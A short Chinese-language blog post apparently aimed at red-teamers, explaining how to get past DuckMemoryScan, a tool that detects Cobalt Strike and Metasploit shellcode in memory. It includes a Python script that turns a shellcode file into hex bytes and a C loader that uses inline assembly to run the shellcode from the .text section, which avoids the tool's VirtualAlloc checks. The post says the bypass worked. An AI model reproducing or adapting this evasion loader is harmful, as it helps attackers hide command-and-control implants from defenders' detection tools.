蹭热点之绕过DuckMemoryScan

昨天的事，谢谢各位师傅们了，所以写了该文来感谢各位师傅。而且今天是元宵节，祝大家元宵节快乐哦。

昨天，Github上出现了一个针对CS与MSF的内存扫描项目名叫DuckMemoryScan地址为：https://github.com/huoji120/DuckMemoryScan

根据该项目的介绍：

1. HWBP hook检测 检测线程中所有疑似被hwbp隐形挂钩
2. 内存免杀shellcode检测(metasploit,Cobaltstrike完全检测)
3. 可疑进程检测(主要针对有逃避性质的进程[如过期签名与多各可执行区段])
4. 无文件落地木马检测(检测所有已知内存加载木马)
5. 简易rootkit检测(检测证书过期/拦截读取/证书无效的驱动)

也就是类似于之前的CobaltStrikeScan之类的工具，我们来看一下如何绕过它。

首先拿了一个我之前的免杀马做测试，发现成功的检测出来了，毕竟项目介绍中也写到了会对"VirtualAlloc"函数进行检测。

那么我们就可以来想其他办法来操作了，项目介绍中说 但大部分普通程序均不会在VirtualAlloc区域内执行代码.一般都是在.text区段内执行代码，那我们在.text区段内执行代码不就行了嘛。

先使用我们的脚本转换一下shellcode

import binascii
import sys
import re

if __name__ == "__main__":
  
  if len(sys.argv) < 2:
    sys.exit(0)
    
  try:
    data = binascii.b2a_hex(open(sys.argv[1], "rb").read()).decode()
  except:
    print("Error reading %s" % sys.argv[1])
    sys.exit(0)
    
  if "-list" in sys.argv:
    print("0x" + ",0x".join(re.findall("..", data)))
  else:
    print("\\x" + "\\x".join(re.findall("..", data)))

然后加载：

#include <Windows.h>

int main() {
    asm("call code\n\t"
        ".byte {{SHELLCODE}}\n\t" 
        "code:\n\t"
        "ret\n\t");

  return 0;
}

成功写入

成功绕过检测。